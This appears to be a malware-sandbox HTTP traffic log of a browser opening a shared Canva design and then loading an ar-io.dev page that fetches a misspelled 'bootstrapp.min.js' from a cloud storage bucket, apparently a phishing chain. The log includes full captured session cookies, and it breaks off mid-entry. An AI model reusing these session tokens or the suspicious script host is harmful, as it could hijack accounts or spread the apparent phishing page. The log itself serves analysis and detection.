"Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor HTTP/1.1Host: adservice.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=5T4y3Aln1rq9tz4IP5pa2XLlMoT8sVjBne%2B7ZY3jjKITHDmZmuC8CFU7uPPJ3nzj4lD3skaWzRa7Sk22VvZkaXCzcC8ETNGf7ip%2BP6beUKCjAkpBcTbU3jEs8iTQZw%3D%3D
Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&_eu=AEA&sst.tft=1732114904608&sst.sp=1&sst.em_event=1&sst.ude=0&_s=3&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=scroll&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_17321153895180&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=no&ep.custom_consent_gtm_fpc_rtid=no&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=gtm.init&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&ep.custom_cart_item=%5Bobject%20Object%5D&epn.percent_scrolled=90&_et=15&tfd=38556&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=GYFpx2ppo%2Bt%2B6qRJxuMuOJaeEAwVmlIKok47MzaIbwTB4meAHr6pLS%2F9BwzzxoHZ0RRq8%2FKcJoEYgUAulVl5PapbEdcuj0BcRCm3WC05%2FzGsiUDm3RcLmITN82mn1Q%3D%3D
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /activity;src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=417781846;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/804757079/?random=170052841&fst=1732114917227&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20290%3Bevent_id%3D1732115097455_173211538951881%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_cart_item%3D%5Bobject%20Object%5D%3Bcustom_doctype_id%3DTACQ-gtv2Yk%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l3l1l1&ec_mode=c&uip=8.46.123.0&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&pscdl=noapi&tag_exp=101925629~102067555~102067808~102077855~102081485&s3p=1&ct_cookie_present=false&crd=CLHBsQIIsMGxAgi5wbECCLHDsQIIisWxAgjCybECCOvGsQII08WxAiIBAUABSidldmVudC1zb3VyY2UsIHRyaWdnZXI7bmF2aWdhdGlvbi1zb3VyY2ViBAoCAgM&pscrd=CO_BvIH0zKzk6wEiEwidz5n0luuJAxVOTqQEHd3gAhMyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6Fmh0dHBzOi8vd3d3LmNhbnZhLmNvbS8&is_vtc=1&cid=CAQSKQCa7L7dqBYW8s20NOf8HsWwirmlVPRHLifkK7jbD03gujMNfzr2r1_T&eitems=ChAIgK72uQYQmOOe_P6C3sR8Eh0AVyOIN7xHlsfn8vpQewSDDRmIJNqb4kUoYTuqIQ&random=251903760 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrapp.min.js HTTP/1.1Host: robertreed1313-1323985617.cos.na-ashburn.myqcloud.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ddm/fls/z/src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=417781846;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor HTTP/1.1Host: adservice.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/804757079/?random=170052841&fst=1732114917227&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902&value=0&url=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&tiba=Canva%20Design&data=event%3Dnew.user.engagement%3Bgtm_web_details%3DGTM-TZPTKRR%20%7C%20290%3Bevent_id%3D1732115097455_173211538951881%3Bcustom_dicbo%3Dnot%20set%3Bcustom_consent_gtm_outbrain%3Dyes%3Bcustom_consent_gtm_fpc_rtid%3Dyes%3Bcustom_data_newSession2%3D1%3Bcustom_device_category%3Ddesktop%3Bcustom_event_name%3Dnew.user.engagement%3Bcustom_quantity%3D0%3Bcustom_step%3Dnot%20set%3Bcustom_user_type_by_user_id%3Dguest%3Bevent_action%3Dno-value%3Bcustom_cart_item%3D%5Bobject%20Object%5D%3Bcustom_doctype_id%3DTACQ-gtv2Yk%3Bcustom_product_variant%3Dweb-2%3Bcustom_country_code%3DUS%3Bcustom_app_name%3Dweb&rdp=1&dma=0&npa=0&gcd=13l3l3l3l1l1&ec_mode=c&uip=8.46.123.0&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&pscdl=noapi&tag_exp=101925629~102067555~102067808~102077855~102081485&s3p=1&ct_cookie_present=false&crd=CLHBsQIIsMGxAgi5wbECCLHDsQIIisWxAgjCybECCOvGsQII08WxAiIBAUABSidldmVudC1zb3VyY2UsIHRyaWdnZXI7bmF2aWdhdGlvbi1zb3VyY2ViBAoCAgM&pscrd=CO_BvIH0zKzk6wEiEwidz5n0luuJAxVOTqQEHd3gAhMyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6Fmh0dHBzOi8vd3d3LmNhbnZhLmNvbS8&is_vtc=1&cid=CAQSKQCa7L7dqBYW8s20NOf8HsWwirmlVPRHLifkK7jbD03gujMNfzr2r1_T&eitems=ChAIgK72uQYQmOOe_P6C3sR8Eh0AVyOIN7xHlsfn8vpQewSDDRmIJNqb4kUoYTuqIQ&random=251903760 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrapp.min.js HTTP/1.1Host: robertreed1313-1323985617.cos.na-ashburn.myqcloud.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET 